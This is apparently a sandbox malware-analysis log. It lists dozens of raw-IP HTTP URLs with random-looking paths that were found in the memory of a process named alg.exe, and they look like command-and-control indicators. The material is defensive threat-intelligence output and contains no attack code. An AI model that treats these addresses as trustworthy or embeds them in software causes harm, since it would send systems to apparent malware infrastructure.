Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/95Z4
Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/E6
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/I6
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/e6
Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/hmsaqgigfaxqle
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/tpnpycqre
Source: alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138:80/hmsaqgigfaxqleZ
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138:80/tpnpycqre
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.143:80/gcfjbafgheaeckZ
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/0
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/1
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/U6
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dnuv
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2646796580.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2641170995.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/hij
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2646796580.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2641170995.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/hijttingsfia4
Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/idnuv
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/idnuvngs
Source: alg.exe, 00000010.00000003.2469063610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/jntykoegrmymca
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/luqhjxxa
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/luqhjxxa6
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/ngs
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/p
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/idnuvL
Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1625043610.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/luqhjxxaeight
Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2758575207.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/
Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/P
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2707611078.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2838553167.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2821712135.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2869356422.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2847946283.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2787015500.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2859107398.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2813010985.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2768042043.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2795361454.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/agwyffystye
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2838553167.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2821712135.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2869356422.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2847946283.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2787015500.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2859107398.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2813010985.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2768042043.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2795361454.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/agwyffystyegslio4
Source: alg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/aoayitmlcu
Source: alg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/aoayitmlcurkm
Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/bulntsganndw5e
Source: alg.exe, 00000010.00000003.2494888019.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/cqrtypmijgihv
Source: alg.exe, 00000010.00000003.2494888019.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/cqrtypmijgihvRiU4
Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/dgltjhlriyylmg
Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/gmkfkxvhjjwggemmie
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/m
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248:80/nhxpdndgorrZ
Source: alg.exe, 00000010.00000003.2750711951.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/
Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/exygmnocmwksymmie
Source: alg.exe, 00000010.00000003.2506262657.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2504973605.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/vuf
Source: alg.exe, 00000010.00000003.2506262657.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2504973605.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/vufngsqi
Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/H
Source: alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/U6
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/bh
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/bh.T
Source: alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/mr
Source: alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/mrttingsoih4
Source: alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/xllckl
Source: alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/xllcklc8e8c945i64(
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245:80/bhg
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245:80/hckdbdnsiwdW
Source: alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.254.94.185/byhbnbikqcomemw
Source: alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.254.94.185/byhbnbikqcomemwsqi
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/
Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/lio4
Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/p
Source: alg.exe, 00000010.00000003.2093566744.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/tpndpotkaatb
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2707611078.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/rbpibulhoasascdr
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/
Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/wnele
Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/wneleRiU4
Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/wnelecid4
Source: alg.exe, 00000010.00000003.2453121130.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/xsnbcmvbhjayqro
Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/I6
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/ekxop
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2623426978.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/fiarjsoopiyhm
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2623426978.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/fiarjsoopiyhmRiU4
Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/fiarjsoopiyhmsqi
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/vekxop
Source: alg.exe, 00000010.00000003.2079470414.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/vekxopatb
Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/vekxopngs
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200:80/vekxop
Source: alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1p
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1q6
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1s
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/55
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/e6
Source: alg.exe, 00000010.00000003.1644399119.0000000000576000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/rwebgnmbtiq
Source: alg.exe, 00000010.00000003.1637081830.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/w
Source: alg.exe, 00000010.00000003.1637081830.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/wV
Source: alg.exe, 00000010.00000003.2054624676.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/wstlgiiatb
Source: alg.exe, 00000010.00000003.2054624676.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/wstlgu6
Source: alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/rwebgnmbtiq&
Source: alg.exe, 00000010.00000003.1637081830.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/w0
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/wstlg
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/wfcpepuolxclud
Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/xwfedwcvhvxkiha
Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/E6
